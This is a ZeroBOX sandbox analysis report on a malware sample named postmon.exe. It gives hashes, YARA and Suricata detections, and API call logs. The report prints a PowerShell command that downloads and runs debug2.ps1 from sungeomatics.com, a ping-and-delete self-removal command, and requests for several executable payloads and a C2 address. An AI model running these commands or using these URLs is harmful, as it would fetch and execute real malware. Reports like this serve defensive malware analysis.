popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

postmon.exe

Generic Malware UPX Antivirus Malicious Library Malicious Packer PE File OS Processor Check PE32 PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 22, 2023, 10:31 a.m. June 22, 2023, 10:35 a.m.
Size 382.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 f7d6bd06f96439787aa170983ab55c3e
SHA256 69a695a22c366f9ccdbcb42e6654834bbecef41cda7f9cd2d81d21912fcd0a1c
CRC32 58F18954
ssdeep 6144:q0FPy3bQeuMyxK2hGFgAObpOXFVrZLqaZ3A8ihSxfw+o7Rpybm:qV3GdGFgliX5+JUq+eAm
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
sungeomatics.com
A 205.134.251.88
205.134.251.88
IP Address Status Action
164.124.101.2 Active Moloch
195.123.226.82 Active Moloch
205.134.251.88 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49170 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49162
205.134.251.88:443 		C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=sungeomatics.com a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd
TLSv1
192.168.56.101:49165
205.134.251.88:443 		None None None
TLSv1
192.168.56.101:49170
205.134.251.88:443 		C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=sungeomatics.com a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

 buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f33c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7140
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a6a40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a70d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a73e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7290
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7990
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7990
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8a7920
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001d62d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001d62d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f32e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001f32e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8d3ea0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8d3ea0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b924430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .gfids
resource name AFX_DIALOG_LAYOUT
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/dd_64.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc4.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc5.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc1.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/debug2.ps1
request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
request GET https://sungeomatics.com/css/colors/dd_64.exe
request GET https://sungeomatics.com/css/colors/cc2.exe
request GET https://sungeomatics.com/css/colors/cc3.exe
request GET https://sungeomatics.com/css/colors/cc4.exe
request GET https://sungeomatics.com/css/colors/cc5.exe
request GET https://sungeomatics.com/css/colors/cc1.php
request GET https://sungeomatics.com/css/colors/cc2.php
request GET https://sungeomatics.com/css/colors/cc3.php
request GET https://sungeomatics.com/css/colors/debug2.ps1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 2359296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ad0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3891000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b10000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b11000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b0e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00142000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00143000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0004a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00191000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2740
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c97000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
file C:\Users\test22\AppData\Local\Temp\postmon.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

